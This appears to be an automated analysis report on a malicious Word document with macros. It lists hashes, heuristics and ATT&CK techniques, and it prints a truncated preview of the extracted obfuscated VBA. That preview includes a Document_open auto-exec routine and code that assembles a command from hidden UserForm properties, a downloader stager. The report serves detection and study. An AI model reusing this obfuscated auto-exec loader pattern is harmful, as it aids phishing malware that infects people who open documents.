Office (OLE) malware analysis — malicious · 7c220378cb3994b0

MALICIOUS

Office (OLE)

206.8 KB Created: 2019-12-19 13:26:00 Authoring application: Microsoft Office Word First seen: 2020-02-04

MD5: 18c83322405e103513aadf17af2bb50a SHA-1: 73ae156db894fa1df68957ba917979b9e7ce6f22 SHA-256: 7c220378cb3994b0fc701621095ef8de8bce2fd46a87910fb0e228ed8e095d39

242 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample contains VBA macros, including a Document_Open macro, which is a common technique for executing malicious code upon opening the document. The presence of CreateObject and GetObject calls, along with a hidden UserForm command stager, strongly suggests the macro is designed to download and execute a second-stage payload. The specific obfuscation techniques used indicate a deliberate attempt to evade detection.

Heuristics 7

VBA macros detected medium 5 related findings OLE_VBA_MACROS

Document contains VBA macro code
VBA UserForm hidden-property command stager critical OLE_VBA_USERFORM_HIDDEN_COMMAND_STAGER

VBA auto-exec macro creates a COM object from a decoded variable and reconstructs command text through Split/Join and hidden UserForm properties such as ControlTipText, Tag, Pages, or HelpContextId. This is a high-confidence macro downloader/loader shape seen in the reviewed OLE set, but it is not an Office CVE exploit primitive.
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro
CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call
GetObject call high OLE_VBA_GETOBJ

GetObject call
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 13797 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	13797 bytes
SHA-256: `675ba6f36ba020343c91c3a3cc7ef3e38554616fcb0cabbf86044af52d11c671`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "Qriiuijee" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Control = "Sywkvcfbn, 0, 0, MSForms, TextBox" Private Sub Document_open() Piodbecawzfc = "Culpa quod recusandae rerum tenetur qui sint atque consequuntur quo." Dim Clqttkurs As String Dim Bqhqshzz As Double Pvcftyhznrz = ("Repudiandae minus et tempora.") Dim Wxgqzawyqcb As Integer Dim Ujesfcdrnpo As Integer Dim Lnreucmz As Boolean Lqzyvsytafee = Vlwlzihsdzpi Dim Hznpiqscfe As Integer Ownhvhqwijfaz = ("Et atque velit occaecati rerum porro ad.") Dim Tmajmkmmbr As String Dim Gctfseaulevdh As Integer Dim Dytnpfezpf As String Objlpflktpdn = "Soluta ad quis sit quo eveniet." Dim Iaoqwcuzjohez As String Dim Cdayjmsb As Boolean Dim Xwhrnugqq As String Lyiszorv = ("Debitis perferendis.") Dim Guirldpmnp As Boolean Lyfniwtanjux = 554 Sfjybfour = Acrredhdqnjmm Bdxwakagkjco = 786 Elfkrqozzsp Eerifoxbhfsv = "Et commodi dolorem reiciendis." Dim Socqgypddt As Boolean Dim Tghttehcemdlf As Double Gqqimbjr = ("Numquam animi.") Dim Rfaeaaxciuqt As Boolean Dim Nnofgkrksv As String Dim Nltvjpebczh As Double Mgjwtmnc = Ynelsagnevnm Dim Nlbpniogp As String Ehnyivkjquhe = ("Totam.") Dim Awmcdqzuaj As Boolean Dim Xovgsxdros As Boolean Dim Vzcdvnfgxdn As String Dlkvjher = "Ut eius." Dim Wnkcjbmxhdyhe As String Dim Zmdaoubieomt As Integer Dim Loxybgpkl As Integer Kffjdwhwz = ("Juanita") Dim Aqjduefoxhqt As Boolean Bidhfobhvdp = 788 Brewwtrngoxlk = Yxulkuboeotvs Gnyfextltzda = 760 End Sub Attribute VB_Name = "Yuzjruliymop" Attribute VB_Base = "0{65DE3A53-5B2E-411C-90FE-71FC5BF968A5}{8A793CE6-0864-4A8B-8D48-E0EA095415FE}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Attribute VB_Name = "Ebwkpbwyfpq" Function Jfrouscdsym() Yfwjefctgsplu = "Edmond" Dim Btjqfjhcxphlk As Double Dim Erqlthogoq As Integer Poubfzeto = ("Ut quisquam quis eos.") Dim Opqcyuwts As Double Dim Oyuiaonnvzodr As Double Dim Obmgewlj As Integer Cfpmrxyktawgx = Fbyhamzovgv Dim Szdosmxjxa As Boolean Qsyoghem = ("Et.") Dim Vncbjdrtgwqmr As Integer Dim Hnkcgiatfjtaa As String Dim Quuueqmrdtrdu As Boolean Dbeqzuukkp = "Aperiam in accusamus omnis." Dim Xspdreifvrxp As Double Dim Wgioeflsfsvj As Double Dim Wjjejwpy As Double Azmcqldpjey = ("Sed qui deserunt.") Dim Wlphemwh As Double Ejmhtgkgxss = 364 Sjcupgzlf = Nstpkmrir Teejjzybu = 328 Akohddomahcsv = Qriiuijee.Sywkvcfbn Ygwavknuysbki = "Rerum mollitia quibusdam recusandae." Dim Jcaqogtuufap As Double Dim Wzwllgve As Boolean Fhrhxngvixg = ("Garry") Dim Xnqemcuvvn As Double Dim Sezxywfz As String Dim Hpmxgzegcx As Boolean Zxubjbirktb = Jgykbbaz Dim Bspwvrols As Double Ebcwmdqva = ("Et.") Dim Gsxsfvawvnm As Integer Dim Jufnawhizyef As String Dim Oyjdlsnlwzc As Double Kwjssjjnsxdv = "Odit." Dim Fgusnjhmy As Integer Dim Bzgxxglodx As String Dim Gmwmavagihm As Integer Cgobkyxyi = ("Exercitationem asperiores et assumenda non temporibus nihil iste qui.") Dim Cqvrrgaitr As String Rwhqyebtn = 751 Vawntzorxvmk = Ipbgdnno Echztgxvdxzru = 288 Dexpcfjyh = Akohddomahcsv + Yuzjruliymop.Vfztfxqbyqd + Yuzjruliymop.Wlniqqbwveycp + Yuzjruliymop.Dnndzgkmrx Ofmuibzxhd = "Corrupti." Dim Ybfkvcminuw As Double Dim Idotgqme As String Itpgwvvgljckl = ("Israel") Dim Pyrnxtivt As Integer Dim Ldbngjkcwrfvq As Boolean Dim Olhyxsmnrrur As Double Axvfyjsfx = Zifojcbzefwo Dim Ezpkvlru As Integer Tkqrdaindfykh = ("Soluta modi facilis nobis repudiandae omnis eum nobis.") Dim Osrmzdjad As String Dim Cvbscfjjvz As Integer Dim Wewjlpeurq As Double Szhzsjjmx = "May" Dim Nlldsaydicivh As Boolean Dim Ykyzsmtuzcxk As Boolean Dim Pzndhjxzmm As String Ntfkdawylyox = ("Deserunt.") Dim Trmauphrtc As Inte ... (truncated)

SHA-256: 675ba6f36ba020343c91c3a3cc7ef3e38554616fcb0cabbf86044af52d11c671

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "Qriiuijee"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "Sywkvcfbn, 0, 0, MSForms, TextBox"
Private Sub Document_open()
   Piodbecawzfc = "Culpa quod recusandae rerum tenetur qui sint atque consequuntur quo."
Dim Clqttkurs As String
Dim Bqhqshzz As Double
Pvcftyhznrz = ("Repudiandae minus et tempora.")
Dim Wxgqzawyqcb As Integer
Dim Ujesfcdrnpo As Integer
Dim Lnreucmz As Boolean
Lqzyvsytafee = Vlwlzihsdzpi
Dim Hznpiqscfe As Integer
Ownhvhqwijfaz = ("Et atque velit occaecati rerum porro ad.")
Dim Tmajmkmmbr As String
Dim Gctfseaulevdh As Integer
Dim Dytnpfezpf As String
Objlpflktpdn = "Soluta ad quis sit quo eveniet."
Dim Iaoqwcuzjohez As String
Dim Cdayjmsb As Boolean
Dim Xwhrnugqq As String
Lyiszorv = ("Debitis perferendis.")
Dim Guirldpmnp As Boolean
Lyfniwtanjux = 554
Sfjybfour = Acrredhdqnjmm
Bdxwakagkjco = 786
Elfkrqozzsp
   Eerifoxbhfsv = "Et commodi dolorem reiciendis."
Dim Socqgypddt As Boolean
Dim Tghttehcemdlf As Double
Gqqimbjr = ("Numquam animi.")
Dim Rfaeaaxciuqt As Boolean
Dim Nnofgkrksv As String
Dim Nltvjpebczh As Double
Mgjwtmnc = Ynelsagnevnm
Dim Nlbpniogp As String
Ehnyivkjquhe = ("Totam.")
Dim Awmcdqzuaj As Boolean
Dim Xovgsxdros As Boolean
Dim Vzcdvnfgxdn As String
Dlkvjher = "Ut eius."
Dim Wnkcjbmxhdyhe As String
Dim Zmdaoubieomt As Integer
Dim Loxybgpkl As Integer
Kffjdwhwz = ("Juanita")
Dim Aqjduefoxhqt As Boolean
Bidhfobhvdp = 788
Brewwtrngoxlk = Yxulkuboeotvs
Gnyfextltzda = 760
End Sub

Attribute VB_Name = "Yuzjruliymop"
Attribute VB_Base = "0{65DE3A53-5B2E-411C-90FE-71FC5BF968A5}{8A793CE6-0864-4A8B-8D48-E0EA095415FE}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "Ebwkpbwyfpq"
Function Jfrouscdsym()
   Yfwjefctgsplu = "Edmond"
Dim Btjqfjhcxphlk As Double
Dim Erqlthogoq As Integer
Poubfzeto = ("Ut quisquam quis eos.")
Dim Opqcyuwts As Double
Dim Oyuiaonnvzodr As Double
Dim Obmgewlj As Integer
Cfpmrxyktawgx = Fbyhamzovgv
Dim Szdosmxjxa As Boolean
Qsyoghem = ("Et.")
Dim Vncbjdrtgwqmr As Integer
Dim Hnkcgiatfjtaa As String
Dim Quuueqmrdtrdu As Boolean
Dbeqzuukkp = "Aperiam in accusamus omnis."
Dim Xspdreifvrxp As Double
Dim Wgioeflsfsvj As Double
Dim Wjjejwpy As Double
Azmcqldpjey = ("Sed qui deserunt.")
Dim Wlphemwh As Double
Ejmhtgkgxss = 364
Sjcupgzlf = Nstpkmrir
Teejjzybu = 328
Akohddomahcsv = Qriiuijee.Sywkvcfbn
   Ygwavknuysbki = "Rerum mollitia quibusdam recusandae."
Dim Jcaqogtuufap As Double
Dim Wzwllgve As Boolean
Fhrhxngvixg = ("Garry")
Dim Xnqemcuvvn As Double
Dim Sezxywfz As String
Dim Hpmxgzegcx As Boolean
Zxubjbirktb = Jgykbbaz
Dim Bspwvrols As Double
Ebcwmdqva = ("Et.")
Dim Gsxsfvawvnm As Integer
Dim Jufnawhizyef As String
Dim Oyjdlsnlwzc As Double
Kwjssjjnsxdv = "Odit."
Dim Fgusnjhmy As Integer
Dim Bzgxxglodx As String
Dim Gmwmavagihm As Integer
Cgobkyxyi = ("Exercitationem asperiores et assumenda non temporibus nihil iste qui.")
Dim Cqvrrgaitr As String
Rwhqyebtn = 751
Vawntzorxvmk = Ipbgdnno
Echztgxvdxzru = 288
Dexpcfjyh = Akohddomahcsv + Yuzjruliymop.Vfztfxqbyqd + Yuzjruliymop.Wlniqqbwveycp + Yuzjruliymop.Dnndzgkmrx
   Ofmuibzxhd = "Corrupti."
Dim Ybfkvcminuw As Double
Dim Idotgqme As String
Itpgwvvgljckl = ("Israel")
Dim Pyrnxtivt As Integer
Dim Ldbngjkcwrfvq As Boolean
Dim Olhyxsmnrrur As Double
Axvfyjsfx = Zifojcbzefwo
Dim Ezpkvlru As Integer
Tkqrdaindfykh = ("Soluta modi facilis nobis repudiandae omnis eum nobis.")
Dim Osrmzdjad As String
Dim Cvbscfjjvz As Integer
Dim Wewjlpeurq As Double
Szhzsjjmx = "May"
Dim Nlldsaydicivh As Boolean
Dim Ykyzsmtuzcxk As Boolean
Dim Pzndhjxzmm As String
Ntfkdawylyox = ("Deserunt.")
Dim Trmauphrtc As Inte
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.